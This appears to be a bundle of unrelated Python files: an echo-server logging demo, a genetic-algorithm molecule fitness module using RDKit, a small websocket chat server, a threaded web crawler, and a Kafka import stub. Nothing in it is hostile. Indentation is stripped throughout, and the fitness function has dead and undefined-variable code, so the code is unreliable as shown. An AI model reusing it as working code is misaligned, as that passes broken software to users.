self.logger = logging.getLogger('EchoRequestHandler')
self.logger.debug('__init__')
socketserver.BaseRequestHandler.__init__(self, request,
client_address,
server)
return
def setup(self):
self.logger.debug('setup')
return socketserver.BaseRequestHandler.setup(self)
def handle(self):
self.logger.debug('handle')
# Echo the back to the client
data = self.request.recv(1024)
self.logger.debug('recv()->"%s"', data)
self.request.send(data)
return
def finish(self):
self.logger.debug('finish')
return socketserver.BaseRequestHandler.finish(self)
class EchoServer(socketserver.TCPServer):
def __init__(self, server_address,
handler_class=EchoRequestHandler,
):
self.logger = logging.getLogger('EchoServer')
self.logger.debug('__init__')
socketserver.TCPServer.__init__(self, server_address,
handler_class)
return
def server_activate(self):
self.logger.debug('server_activate')
socketserver.TCPServer.server_activate(self)
return
def serve_forever(self, poll_interval=0.5):
self.logger.debug('waiting for request')
self.logger.info(
'Handling requests, press <Ctrl-C> to quit'
)
socketserver.TCPServer.serve_forever(self, poll_interval)
return
def handle_request(self):
self.logger.debug('handle_request')
return socketserver.TCPServer.handle_request(self)
def verify_request(self, request, client_address):
self.logger.debug('verify_request(%s, %s)',
request, client_address)
return socketserver.TCPServer.verify_request(
self, request, client_address,
)
def process_request(self, request, client_address):
self.logger.debug('process_request(%s, %s)',
request, client_address)
return socketserver.TCPServer.process_request(
self, request, client_address,
)
def server_close(self):
self.logger.debug('server_close')
return socketserver.TCPServer.server_close(self)
def finish_request(self, request, client_address):
self.logger.debug('finish_request(%s, %s)',
request, client_address)
return socketserver.TCPServer.finish_request(
self, request, client_address,
)
def close_request(self, request_address):
self.logger.debug('close_request(%s)', request_address)
return socketserver.TCPServer.close_request(
self, request_address,
)
def shutdown(self):
self.logger.debug('shutdown()')
return socketserver.TCPServer.shutdown(self)
if __name__ == '__main__':
import socket
import threading
address = ('localhost', 0) # let the kernel assign a port
server = EchoServer(address, EchoRequestHandler)
ip, port = server.server_address # what port was assigned?
# Start the server in a thread
t = threading.Thread(target=server.serve_forever)
t.setDaemon(True) # don't hang on exit
t.start()
logger = logging.getLogger('client')
logger.info('Server on %s:%s', ip, port)
# Connect to the server
logger.debug('creating socket')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
logger.debug('connecting to server')
s.connect((ip, port))
# Send the data
message = 'Hello, world'.encode()
logger.debug('sending data: %r', message)
len_sent = s.send(message)
# Receive a response
logger.debug('waiting for response')
response = s.recv(len_sent)
logger.debug('response from server: %r', response)
# Clean up
server.shutdown()
logger.debug('closing socket')
s.close()
logger.debug('done')
server.socket.close()
|
generation_props.py
|
'''
Functions that are used while a Generation is being Evaluated
'''
import os
import random
import multiprocessing
from rdkit import Chem
import numpy as np
from random import randrange
import discriminator as D
import evolution_functions as evo
from SAS_calculator.sascorer import calculateScore
manager = multiprocessing.Manager()
lock = multiprocessing.Lock()
#Added to deal with Similarity: #!# ----------------------------------------
from rdkit.Chem import AllChem
from rdkit.Chem.rdMolDescriptors import GetUSRScore, GetUSRCAT
def calc_prop_USR(unseen_smile_ls, property_name, props_collect):
'''Calculate Similarity for each molecule in unseen_smile_ls, and record results
in locked dictionary props_collect
'''
#To provide reference molecule:
reference_smile = 'C1(=NC(=NC2=C1N=C[N]2[H])N(C3=CC=C(C=C3)[S](=O)(=O)N([H])[H])[H])C4=CC(=CC=C4)C5=CC=CC=C5'
ref_mol = Chem.MolFromSmiles(reference_smile)
AllChem.EmbedMolecule(ref_mol, useRandomCoords = True, enforceChirality = False)
ref_embed_usrcat = GetUSRCAT(ref_mol)
for smile in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smile) #esure valid smile
if did_convert:
try:
mol_test = Chem.MolFromSmiles(smile)
mol_test = Chem.AddHs(mol_test)
AllChem.EmbedMolecule(mol_test, useRandomCoords = True, enforceChirality = False)
mol_test = Chem.RemoveHs(mol_test)
UsrcatMol = GetUSRCAT(mol_test)
except ValueError:
SimScore = 0
else:
SimScore = GetUSRScore(ref_embed_usrcat, UsrcatMol)
props_collect[property_name][smile] = SimScore
else:
raise Exception('Invalid smile encountered while atempting to calculate Similarity') #!# ----------------
#Added to deal with Tanimoto
from rdkit import DataStructs
def calc_prop_Tanimoto(unseen_smile_ls, property_name, props_collect): #-------------------------
'''Calculate Tanimoto Coeff. for each molecule in unseen_smile_ls, and record results
in locked dictionary props_collect
'''
#To provide reference molecule:
reference_smile = 'C1(=NC(=NC2=C1N=C[N]2[H])N(C3=CC=C(C=C3)[S](=O)(=O)N([H])[H])[H])C4=CC(=CC=C4)C5=CC=CC=C5'
Tani_ref_mol = Chem.MolFromSmiles(reference_smile)
Tani_ref_FP = Chem.RDKFingerprint(Tani_ref_mol)
for smile in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smile) #esure valid smile
if did_convert:
mol_Tani_test = Chem.MolFromSmiles(smile)
Tani_mol_FP = Chem.RDKFingerprint(mol_Tani_test)
TaniScore = DataStructs.FingerprintSimilarity(Tani_mol_FP, Tani_ref_FP)
props_collect[property_name][smile] = TaniScore
else:
raise Exception('Invalid smile encountered while atempting to calculate Tanimoto') #----------------
def calc_prop_logP(unseen_smile_ls, property_name, props_collect):
'''Calculate logP for each molecule in unseen_smile_ls, and record results
in locked dictionary props_collect
'''
for smile in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smile)
if did_convert: # ensure valid smile
props_collect[property_name][smile] = evo.get_logP(mol) # Add calculation
else:
raise Exception('Invalid smile encountered while atempting to calculate logP')
def calc_prop_SAS(unseen_smile_ls, property_name, props_collect):
'''Calculate synthetic accesibility score for each molecule in unseen_smile_ls,
results are recorded in locked dictionary props_collect
'''
for smile in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smile)
if did_convert: # ensure valid smile
props_collect[property_name][smile] = calculateScore(mol)
else:
raise Exception('Invalid smile encountered while atempting to calculate SAS ', smile)
def calc_prop_RingP(unseen_smile_ls, property_name, props_collect):
'''Calculate Ring penalty for each molecule in unseen_smile_ls,
results are recorded in locked dictionary props_collect
'''
for smi in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smi)
if did_convert:
cycle_list = mol.GetRingInfo().AtomRings()
if len(cycle_list) == 0:
cycle_length = 0
else:
cycle_length = max([ len(j) for j in cycle_list ])
if cycle_length <= 6:
cycle_length = 0
else:
cycle_length = cycle_length - 6
props_collect[property_name][smi] = cycle_length
else:
raise Exception('Invalid smile encountered while atempting to calculate Ring penalty ', smi)
def calc_prop_SIMIL(starting_smile, unseen_smile_ls, property_name, props_collect):
'''Calculate logP for each molecule in unseen_smile_ls, and record results
in locked dictionary props_collect
'''
target, _, _ = evo.sanitize_smiles(starting_smile)
for smile in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smile)
if did_convert: # ensure valid smile
props_collect[property_name][smile] = evo.molecule_similarity(mol, target) # Add calculation
else:
raise Exception('Invalid smile encountered while atempting to calculate SIMILARITY: ', smile)
def create_parr_process(chunks, property_name, starting_smile):
''' Create parallel processes for calculation of properties
'''
# Assign data to each process
process_collector = []
collect_dictionaries = []
for item in chunks:
props_collect = manager.dict(lock=True)
smiles_map_ = manager.dict(lock=True)
props_collect[property_name] = smiles_map_
collect_dictionaries.append(props_collect)
if property_name == 'logP':
process_collector.append(multiprocessing.Process(target=calc_prop_logP, args=(item, property_name, props_collect, )))
if property_name == 'SAS':
process_collector.append(multiprocessing.Process(target=calc_prop_SAS, args=(item, property_name, props_collect, )))
if property_name == 'RingP':
process_collector.append(multiprocessing.Process(target=calc_prop_RingP, args=(item, property_name, props_collect, )))
if property_name == 'SIMILR':
process_collector.append(multiprocessing.Process(target=calc_prop_SIMIL, args=(starting_smile, item, property_name, props_collect, )))
if property_name == 'USRSim': #!#
process_collector.append(multiprocessing.Process(target=calc_prop_USR, args=(item, property_name, props_collect, )))
if property_name == 'TaniSim': #!#
process_collector.append(multiprocessing.Process(target=calc_prop_Tanimoto, args=(item, property_name, props_collect, )))
for item in process_collector:
item.start()
for item in process_collector: # wait for all parallel processes to finish
item.join()
combined_dict = {} # collect results from multiple processess
for i,item in enumerate(collect_dictionaries):
combined_dict.update(item[property_name])
return combined_dict
def fitness(molecules_here, properties_calc_ls,
discriminator, disc_enc_type, generation_index,
max_molecules_len, device, num_processors, writer, beta, data_dir, starting_smile, desired_delta, save_curve):
''' Calculate fitness fo a generation in the GA
All properties are standardized based on the mean & stddev of the zinc dataset
Parameters:
molecules_here (list) : List of a string of molecules
properties_calc_ls : List of propertoes to calculate
discriminator (torch.Model) : Pytorch classifier
disc_enc_type (string) : Indicated type of encoding shown to discriminator
generation_index (int) : Which generation indicator
max_molecules_len (int) : Largest mol length
device (string) : Device of discrimnator
Returns:
fitness (np.array) : A lin comb of properties and
discriminator predictions
discriminator_predictions (np.array) : The predictions made by the discrimantor
'''
if properties_calc_ls == None:
raise Exception('Fail discrm trying to be invoked')
fitness = discriminator_predictions
else:
molecules_here_unique = list(set(molecules_here))
ratio = len(molecules_here_unique) / num_processors
chunks = evo.get_chunks(molecules_here_unique, num_processors, ratio)
chunks = [item for item in chunks if len(item) >= 1]
# Parallelize the calculation of logPs
if 'logP' in properties_calc_ls:
logP_results = create_parr_process(chunks, 'logP', starting_smile)
# Parallelize the calculation of SAS
if 'SAS' in properties_calc_ls:
SAS_results = create_parr_process(chunks, 'SAS', starting_smile)
# Parallize the calculation of Ring Penalty
if 'RingP' in properties_calc_ls:
ringP_results = create_parr_process(chunks, 'RingP', starting_smile)
# Parallelize the calculation of SIMILR
if 'SIMILR' in properties_calc_ls:
similar_results = create_parr_process(chunks, 'SIMILR', starting_smile)
# Parallize the calculation of USRCAT Sim #!#
if 'USRSim' in properties_calc_ls:
USRSim_results = create_parr_process(chunks, 'USRSim', starting_smile)
# Parallize the calculation of Tanimoto #!#
if 'TaniSim' in properties_calc_ls:
TaniSim_results = create_parr_process(chunks, 'TaniSim', starting_smile)
logP_calculated, SAS_calculated, RingP_calculated, logP_norm, SAS_norm, RingP_norm, Similarity_calculated, USRSim_calculated, USRSim_norm, TaniSim_calculated, TaniSim_norm = obtained_standardized_properties(molecules_here, logP_results, SAS_results, ringP_results, similar_results, USRSim_results, TaniSim_results)
# Add Objectives
fitness = (USRSim_norm)
# Similarity Based Fitness _________
writer.add_scalar('Mean Similarty', Similarity_calculated.mean(), generation_index) # Mean similarity
writer.add_scalar('Max Similarty', max(Similarity_calculated), generation_index) # Max similarity
Similarity_calculated = np.array([0 if x > desired_delta else -10**6 for x in Similarity_calculated])
Similarity_calculated = Similarity_calculated.reshape((fitness.shape[0], 1))
fitness = fitness + Similarity_calculated
# Plot fitness without discriminator
writer.add_scalar('max fitness without discr', max(fitness), generation_index)
save_curve.append(max(fitness))
writer.add_scalar('avg fitness without discr', fitness.mean(), generation_index)
# max fitness without discriminator
f = open('{}/max_fitness_no_discr.txt'.format(data_dir), 'a+')
f.write(str(max(fitness)[0]) + '\n')
f.close()
# avg fitness without discriminator
f = open('{}/avg_fitness_no_discr.txt'.format(data_dir), 'a+')
f.write(str(fitness.mean()) + '\n')
f.close()
# fitness = (beta * discriminator_predictions) + fitness
# Plot fitness with discriminator
writer.add_scalar('max fitness with discrm', max(fitness), generation_index)
writer.add_scalar('avg fitness with discrm', fitness.mean(), generation_index)
# max fitness with discriminator
f = open('{}/max_fitness_discr.txt'.format(data_dir), 'a+')
f.write(str(max(fitness)[0]) + '\n')
f.close()
# avg fitness with discriminator
f = open('{}/avg_fitness_discr.txt'.format(data_dir), 'a+')
f.write(str(fitness.mean()) + '\n')
f.close()
# Plot properties
writer.add_scalar('non standr max logp', max(logP_calculated), generation_index) # logP plots
writer.add_scalar('non standr mean logp', logP_calculated.mean(), generation_index)
writer.add_scalar('non standr min sas', min(SAS_calculated), generation_index) # SAS plots
writer.add_scalar('non standr mean sas', SAS_calculated.mean(), generation_index)
writer.add_scalar('non standr min ringp', min(RingP_calculated), generation_index) # RingP plots
writer.add_scalar('non standr mean ringp', RingP_calculated.mean(), generation_index)
writer.add_scalar('non standr max USRCAT Similarity', max(USRSim_calculated), generation_index) # USRCAT Similarity plots #!#
writer.add_scalar('non standr mean USRCAT Similarity', USRSim_calculated.mean(), generation_index)
writer.add_scalar('non standr max Tanimoto Similarity', max(TaniSim_calculated), generation_index) # Tanimoto Similarity plots #!#
writer.add_scalar('non standr mean Tanimoto Similarity', TaniSim_calculated.mean(), generation_index)
# max logP - non standardized
f = open('{}/max_logp.txt'.format(data_dir), 'a+')
f.write(str(max(logP_calculated)) + '\n')
f.close()
# mean logP - non standardized
f = open('{}/avg_logp.txt'.format(data_dir), 'a+')
f.write(str(logP_calculated.mean()) + '\n')
f.close()
# min SAS - non standardized
f = open('{}/min_SAS.txt'.format(data_dir), 'a+')
f.write(str(min(SAS_calculated)) + '\n')
f.close()
# mean SAS - non standardized
f = open('{}/avg_SAS.txt'.format(data_dir), 'a+')
f.write(str(SAS_calculated.mean()) + '\n')
f.close()
# min RingP - non standardized
f = open('{}/min_RingP.txt'.format(data_dir), 'a+')
f.write(str(min(RingP_calculated)) + '\n')
f.close()
# mean RingP - non standardized
f = open('{}/avg_RingP.txt'.format(data_dir), 'a+')
f.write(str(RingP_calculated.mean()) + '\n')
f.close()
# max USRCAT Similarity - non standardised #!#
f = open('{}/max_Similarity.txt'.format(data_dir), 'a+')
f.write(str(max(USRSim_calculated)) + '\n')
f.close()
# mean USRCAT Similarity - non standardized #!#
f = open('{}/avg_Similarity.txt'.format(data_dir), 'a+')
f.write(str(USRSim_calculated.mean()) + '\n')
f.close()
# max Tanimoto Similarity - non standardised #!#
f = open('{}/max_Tanimoto.txt'.format(data_dir), 'a+')
f.write(str(max(TaniSim_calculated)) + '\n')
f.close()
# mean Tanimoto Similarity - non standardized #!#
f = open('{}/avg_Tanimoto.txt'.format(data_dir), 'a+')
f.write(str(TaniSim_calculated.mean()) + '\n')
f.close()
return fitness, logP_calculated, SAS_calculated, RingP_calculated, USRSim_calculated, TaniSim_calculated
def obtained_standardized_properties(molecules_here, logP_results, SAS_results, ringP_results, similar_results, USRSim_results, TaniSim_results): #!#
''' Obtain calculated properties of molecules in molecules_here, and standardize
values base on properties of the Zinc Data set.
'''
logP_calculated = []
SAS_calculated = []
RingP_calculated = []
Similarity_calculated = []
USRSim_calculated = [] #!#
TaniSim_calculated = [] #!#
for smi in molecules_here:
logP_calculated.append(logP_results[smi])
SAS_calculated.append(SAS_results[smi])
RingP_calculated.append(ringP_results[smi])
Similarity_calculated.append(similar_results[smi])
USRSim_calculated.append(USRSim_results[smi]) #!#
TaniSim_calculated.append(TaniSim_results[smi]) #!#
logP_calculated = np.array(logP_calculated)
SAS_calculated = np.array(SAS_calculated)
RingP_calculated = np.array(RingP_calculated)
Similarity_calculated = np.array(Similarity_calculated)
USRSim_calculated = np.array(USRSim_calculated) #!#
TaniSim_calculated = np.array(TaniSim_calculated) #!#
# Standardize logP based on zinc logP (mean: 2.4729421499641497 & std : 1.4157879815362406)
logP_norm = (logP_calculated - 2.4729421499641497) / 1.4157879815362406
logP_norm = logP_norm.reshape((logP_calculated.shape[0], 1))
# Standardize SAS based on zinc SAS(mean: 3.0470797085649894 & std: 0.830643172314514)
SAS_norm = (SAS_calculated - 3.0470797085649894) / 0.830643172314514
SAS_norm = SAS_norm.reshape((SAS_calculated.shape[0], 1))
# Standardiize RingP based on zinc RingP(mean: 0.038131530820234766 & std: 0.2240274735210179)
RingP_norm = (RingP_calculated - 0.038131530820234766) / 0.2240274735210179
RingP_norm = RingP_norm.reshape((RingP_calculated.shape[0], 1))
# Standardize USRCAT Similarity based on zinc ChemBL Similarity(mean: 3.053230897406870 & std: 0.834794987448313) #!#
USRSim_norm = (USRSim_calculated - 0.186428542) / 0.035664915
USRSim_norm = USRSim_norm.reshape((USRSim_calculated.shape[0], 1)) #!#
# Standardize Tanimoto Similarity based on ChemBL Tanimoto Similarity(mean: 0.350252265668509 & std: 0.0681108949632873) #!#
TaniSim_norm = (TaniSim_calculated - 0.350252265668509) / 0.0681108949632873
TaniSim_norm = TaniSim_norm.reshape((TaniSim_calculated.shape[0], 1)) #!#
return logP_calculated, SAS_calculated, RingP_calculated, logP_norm, SAS_norm, RingP_norm, Similarity_calculated, USRSim_calculated, USRSim_norm, TaniSim_calculated, TaniSim_norm
def obtain_fitness(disc_enc_type, smiles_here, selfies_here, properties_calc_ls,
discriminator, generation_index, max_molecules_len, device, generation_size, num_processors, writer, beta, image_dir, data_dir, starting_smile, desired_delta, save_curve):
''' Obtain fitness of generation based on choices of disc_enc_type.
Essentially just calls 'fitness'
'''
# ANALYSE THE GENERATION #!#
if disc_enc_type == 'smiles' or disc_enc_type == 'properties_rdkit':
fitness_here, logP_calculated, SAS_calculated, RingP_calculated, USRSim_calculated, TaniSim_calculated = fitness(smiles_here, properties_calc_ls , discriminator,
disc_enc_type, generation_index, max_molecules_len, device, num_processors, writer, beta, data_dir, starting_smile, desired_delta, save_curve)
elif disc_enc_type == 'selfies':
fitness_here, logP_calculated, SAS_calculated, RingP_calculated, USRSim_calculated, TaniSim_calculated = fitness(selfies_here, properties_calc_ls , discriminator,
disc_enc_type, generation_index, max_molecules_len, device, num_processors, writer, beta, data_dir, starting_smile, desired_delta, save_curve)
fitness_here = fitness_here.reshape((generation_size, ))
order, fitness_ordered, smiles_ordered, selfies_ordered = order_based_on_fitness(fitness_here, smiles_here, selfies_here)
# Order molecules based on ordering of 'smiles_ordered'
logP_calculated = [logP_calculated[idx] for idx in order]
SAS_calculated = [SAS_calculated[idx] for idx in order]
RingP_calculated = [RingP_calculated[idx] for idx in order]
USRSim_calculated = [USRSim_calculated[idx] for idx in order] #!#
TaniSim_calculated = [TaniSim_calculated[idx] for idx in order] #!#
os.makedirs('{}/{}'.format(data_dir, generation_index))
# Write ordered smiles in a text file
f = open('{}/{}/smiles_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in smiles_ordered])
f.close()
# Write logP of ordered smiles in a text file
f = open('{}/{}/logP_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in logP_calculated])
f.close()
# Write sas of ordered smiles in a text file
f = open('{}/{}/sas_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in SAS_calculated])
f.close()
# Write ringP of ordered smiles in a text file
f = open('{}/{}/ringP_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in RingP_calculated])
f.close()
# Write USRCAT Similarity of ordered smiles in a text file #!#
f = open('{}/{}/USRCATSimilarity_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in USRSim_calculated])
f.close()
# Write Tanimoto Similarity of ordered smiles in a text file #!#
f = open('{}/{}/Tanimoto_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in TaniSim_calculated])
f.close()
#print statement for the best molecule in the generation
print('Best best molecule in generation ', generation_index)
print(' smile : ', smiles_ordered[0])
print(' fitness: ', fitness_ordered[0])
print(' logP : ', logP_calculated[0])
print(' sas : ', SAS_calculated[0])
print(' ringP : ', RingP_calculated[0])
print(' USRCAT : ', USRSim_calculated[0]) #!#
print(' Tanimoto : ', TaniSim_calculated[0]) #!# #!# --> Another Similarity change to the right and two lines down |
#!# V
f = open('{}/best_in_generations.txt'.format(data_dir), 'a+')
best_gen_str = 'index: {}, smile: {}, fitness: {}, logP: {}, sas: {}, ringP: {}, USRCAT: {}, Tanimoto: {}'.format(generation_index, smiles_ordered[0], fitness_ordered[0], logP_calculated[0], SAS_calculated[0], RingP_calculated[0], USRSim_calculated[0], TaniSim_calculated[0])
f.write(best_gen_str + '\n')
f.close()
#!# -->
show_generation_image(generation_index, image_dir, smiles_ordered, fitness_ordered, logP_calculated, SAS_calculated, RingP_calculated, USRSim_calculated, TaniSim_calculated)
return fitness_here, order, fitness_ordered, smiles_ordered, selfies_ordered
def show_generation_image(generation_index, image_dir, smiles_ordered, fitness, logP, SAS, RingCount, USRSim, TaniSim): #!#
''' Plot 100 molecules with the best fitness in in a generation
Called after at the end of each generation. Image in each generation
is stored with name 'generation_index.png'
Images are stored in diretory './images'
'''
if generation_index > 1:
A = list(smiles_ordered)
A = A[:100]
if len(A) < 100 : return #raise Exception('Not enough molecules provided for plotting ', len(A))
A = [Chem.MolFromSmiles(x) for x in A]
evo.create_100_mol_image(A, "./{}/{}_ga.png".format(image_dir, generation_index), fitness, logP, SAS, RingCount, USRSim, TaniSim) #!#
def obtain_previous_gen_mol(starting_smiles, starting_selfies, generation_size,
generation_index, selfies_all, smiles_all):
'''Obtain molecules from one generation prior.
If generation_index is 1, only the the starting molecules are returned
Parameters:
Returns:
'''
# Obtain molecules from the previous generation
if generation_index == 1:
randomized_smiles = []
randomized_selfies = []
for i in range(generation_size): # nothing to obtain from previous gen
# So, choose random moleclues from the starting list
index = randrange(len(starting_smiles))
randomized_smiles.append(starting_smiles[index])
randomized_selfies.append(starting_selfies[index])
return randomized_smiles, randomized_selfies
else:
return smiles_all[generation_index-2], selfies_all[generation_index-2]
def order_based_on_fitness(fitness_here, smiles_here, selfies_here):
'''Order elements of a lists (args) based om Decreasing fitness
'''
order = np.argsort(fitness_here)[::-1] # Decreasing order of indices, based on fitness
fitness_ordered = [fitness_here[idx] for idx in order]
smiles_ordered = [smiles_here[idx] for idx in order]
selfies_ordered = [selfies_here[idx] for idx in order]
return order, fitness_ordered, smiles_ordered, selfies_ordered
def apply_generation_cutoff(order, generation_size):
''' Return of a list of indices of molecules that are kept (high fitness)
and a list of indices of molecules that are replaced (low fitness)
The cut-off is imposed using a Fermi-Function
Parameters:
order (list) : list of molecule indices arranged in Decreasing order of fitness
generation_size (int) : number of molecules in a generation
Returns:
to_replace (list): indices of molecules that will be replaced by random mutations of
molecules in list 'to_keep'
to_keep (list): indices of molecules that will be kept for the following generations
'''
# Get the probabilities that a molecule with a given fitness will be replaced
# a fermi function is used to smoothen the transition
positions = np.array(range(0, len(order))) - 0.2*float(len(order))
probabilities = 1.0 / (1.0 + np.exp(-0.02 * generation_size * positions / float(len(order))))
to_replace = [] # all molecules that are replaced
to_keep = [] # all molecules that are kept
for idx in range(0,len(order)):
if np.random.rand(1) < probabilities[idx]:
to_replace.append(idx)
else:
to_keep.append(idx)
return to_replace, to_keep
def obtain_next_gen_molecules(order, to_replace, to_keep,
selfies_ordered, smiles_ordered, max_molecules_len):
''' Obtain the next generation of molecules. Bad molecules are replaced by
mutations of good molecules
Parameters:
order (list) : list of molecule indices arranged in Decreasing order of fitness
to_replace (list) : list of indices of molecules to be replaced by random mutations of better molecules
to_keep (list) : list of indices of molecules to be kept in following generation
selfies_ordered (list) : list of SELFIE molecules, ordered by fitness
smiles_ordered (list) : list of SMILE molecules, ordered by fitness
max_molecules_len (int) : length of largest molecule
Returns:
smiles_mutated (list): next generation of mutated molecules as SMILES
selfies_mutated(list): next generation of mutated molecules as SELFIES
'''
smiles_mutated = []
selfies_mutated = []
for idx in range(0,len(order)):
if idx in to_replace: # smiles to replace (by better molecules)
random_index=np.random.choice(to_keep, size=1, replace=True, p=None)[0] # select a random molecule that survived
grin_new, smiles_new = evo.mutations_random_grin(selfies_ordered[random_index], max_molecules_len) # do the mutation
# add mutated molecule to the population
smiles_mutated.append(smiles_new)
selfies_mutated.append(grin_new)
else: # smiles to keep
smiles_mutated.append(smiles_ordered[idx])
selfies_mutated.append(selfies_ordered[idx])
return smiles_mutated, selfies_mutated
def update_gen_res(smiles_all, smiles_mutated, selfies_all, selfies_mutated, smiles_all_counter):
'''Collect results that will be shared with global variables outside generations
'''
smiles_all.append(smiles_mutated)
selfies_all.append(selfies_mutated)
for smi in smiles_mutated:
if smi in smiles_all_counter:
smiles_all_counter[smi] += 1
else:
smiles_all_counter[smi] = 1
return smiles_all, selfies_all, smiles_all_counter
|
talktalktalk.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# TalkTalkTalk
#
# is an easy-installable small chat room, with chat history.
#
# author: Joseph Ernest (twitter: @JosephErnest)
# url: http://github.com/josephernest/talktalktalk
# license: MIT license
import sys, json, bleach, time, threading, dumbdbm, random, re
import daemon
from bottle import route, run, view, request, post, ServerAdapter, get, static_file
from gevent import pywsgi
from geventwebsocket.handler import WebSocketHandler
from geventwebsocket.exceptions import WebSocketError
from collections import deque
from config import PORT, HOST, ADMINNAME, ADMINHIDDENNAME, ALLOWEDTAGS
idx = 0
def websocket(callback):
def wrapper(*args, **kwargs):
callback(request.environ.get('wsgi.websocket'), *args, **kwargs)
return wrapper
class GeventWebSocketServer(ServerAdapter):
def run(self, handler):
server = pywsgi.WSGIServer((self.host, self.port), handler, handler_class=WebSocketHandler)
server.serve_forever()
def main():
global idx
db = dumbdbm.open('talktalktalk.db', 'c')
idx = len(db)
users = {}
pings = {}
usermessagetimes = {}
def send_userlist():
for u in users.keys():
if not u.closed:
u.send(json.dumps({'type' : 'userlist', 'connected': users.values()}))
def clean_username(usr, ws):
username = bleach.clean(usr, tags=ALLOWEDTAGS, strip=True)
#username = re.sub('[ :]', '', username) # removes " ", ":", and the evil char "" http://unicode-table.com/fr/200D/
username = re.sub(r'\W+', '', username) # because of spam and usage of malicious utf8 characters, let's use alphanumeric usernames only for now
username = username[:16]
if username.lower() == ADMINNAME or username == '':
username = 'user' + str(random.randint(0, 1000))
ws.send(json.dumps({'type' : 'usernameunavailable', 'username' : username}))
elif username.lower() == ADMINHIDDENNAME:
username = ADMINNAME
ws.send(json.dumps({'type' : 'displayeduser', 'username' : username}))
return username
def dbworker(): # when a user disappears during more than 30 seconds (+/- 10), remove him/her from the userlist
while True:
userlistchanged = False
t = time.time()
for ws in users.copy():
if t - pings[ws] > 30:
del users[ws]
del pings[ws]
userlistchanged = True
if userlistchanged:
send_userlist()
time.sleep(10)
dbworkerThread = threading.Thread(target=dbworker)
dbworkerThread.daemon = True
dbworkerThread.start()
@get('/ws', apply=[websocket])
def chat(ws):
global idx
usermessagetimes[ws] = deque(maxlen=10)
while True:
try:
receivedmsg = ws.receive()
if receivedmsg is not None:
receivedmsg = receivedmsg.decode('utf8')
if len(receivedmsg) > 4096: # this user is probably a spammer
ws.send(json.dumps({'type' : 'flood'}))
break
pings[ws] = time.time()
if receivedmsg == 'ping': # ping/pong packet to make sure connection is still alive
ws.send('id' + str(idx-1)) # send the latest message id in return
if ws not in users: # was deleted by dbworker
ws.send(json.dumps({'type' : 'username'}))
else:
usermessagetimes[ws].append(time.time()) # flood control
if len(usermessagetimes[ws]) == usermessagetimes[ws].maxlen:
if usermessagetimes[ws][-1] - usermessagetimes[ws][0] < 5: # if more than 10 messages in 5 seconds (including ping messages)
ws.send(json.dumps({'type' : 'flood'})) # disconnect the spammer
break
msg = json.loads(receivedmsg)
if msg['type'] == 'message':
message = (bleach.clean(msg['message'], tags=ALLOWEDTAGS, strip=True)).strip()
if ws not in users: # is this really mandatory ?
username = clean_username(msg['username'], ws)
users[ws] = username
send_userlist()
if message:
if len(message) > 1000:
message = message[:1000] + '...'
s = json.dumps({'type' : 'message', 'message': message, 'username': users[ws], 'id': idx, 'datetime': int(time.time())})
db[str(idx)] = s # Neither dumbdbm nor shelve module allow integer as key... I'm still looking for a better solution!
idx += 1
for u in users.keys():
u.send(s)
elif msg['type'] == 'messagesbefore':
idbefore = msg['id']
ws.send(json.dumps({'type' : 'messages', 'before': 1, 'messages': [db[str(i)] for i in range(max(0,idbefore - 100),idbefore)]}))
elif msg['type'] == 'messagesafter':
idafter = msg['id']
ws.send(json.dumps({'type' : 'messages', 'before': 0, 'messages': [db[str(i)] for i in range(idafter,idx)]}))
elif msg['type'] == 'username':
username = clean_username(msg['username'], ws)
if ws not in users: # welcome new user
ws.send(json.dumps({'type' : 'messages', 'before': 0, 'messages': [db[str(i)] for i in range(max(0,idx - 100),idx)]}))
users[ws] = username
send_userlist()
else:
break
except (WebSocketError, ValueError, UnicodeDecodeError): # ValueError happens for example when "No JSON object could be decoded", would be interesting to log it
break
if ws in users:
del users[ws]
del pings[ws]
send_userlist()
@route('/')
@route('/index.html')
@view('talktalktalk.html')
def index():
context = {'request': request}
return (context)
@route('/popsound.mp3')
def popsound():
return static_file('popsound.mp3', root='.')
run(host=HOST, port=PORT, debug=True, server=GeventWebSocketServer)
class talktalktalk(daemon.Daemon):
def run(self):
main()
if len(sys.argv) == 1: # command line interactive mode
main()
elif len(sys.argv) == 2: # daemon mode
daemon = talktalktalk(pidfile='_.pid', stdout='log.txt', stderr='log.txt')
if 'start' == sys.argv[1]:
daemon.start()
elif 'stop' == sys.argv[1]:
daemon.stop()
elif 'restart' == sys.argv[1]:
daemon.restart()
|
main.py
|
import threading
from queue import Queue
from spider import Spider
from domain import *
from code import *
PROJECT_NAME = input('What is the project_name? >>')
HOMEPAGE = input("What's the website url? >>")
DOMAIN_NAME = get_domain_name(HOMEPAGE)
QUEUE_FILE = PROJECT_NAME + '/queue.txt'
CRAWLED_FILE = PROJECT_NAME + '/crawled.txt'
NUMBER_OF_THREADS = 8
queue = Queue()
Spider(PROJECT_NAME, HOMEPAGE, DOMAIN_NAME)
def create_workers():
for _ in range(NUMBER_OF_THREADS):
t = threading.Thread(target=work)
t.daemon = True
t.start()
#do the next job in the queue
def work():
while True:
url = queue.get()
Spider.crawl_page(threading.current_thread().name,url)
queue.task_done()
def create_jobs():
for link in file_to_set(QUEUE_FILE):
queue.put(link)
queue.join()
crawl()
#crawl the items in queue
def crawl():
queued_links = file_to_set(QUEUE_FILE)
if len(queued_links) > 0 :
print(str(len(queued_links)) + ' in the queue')
create_jobs()
create_workers()
crawl()
|
util.py
|
from __future__ import absolute_import
import atexit
import binascii
import collections
import struct
from threading import Thread, Event
import weakref
from kafka.vendor import six
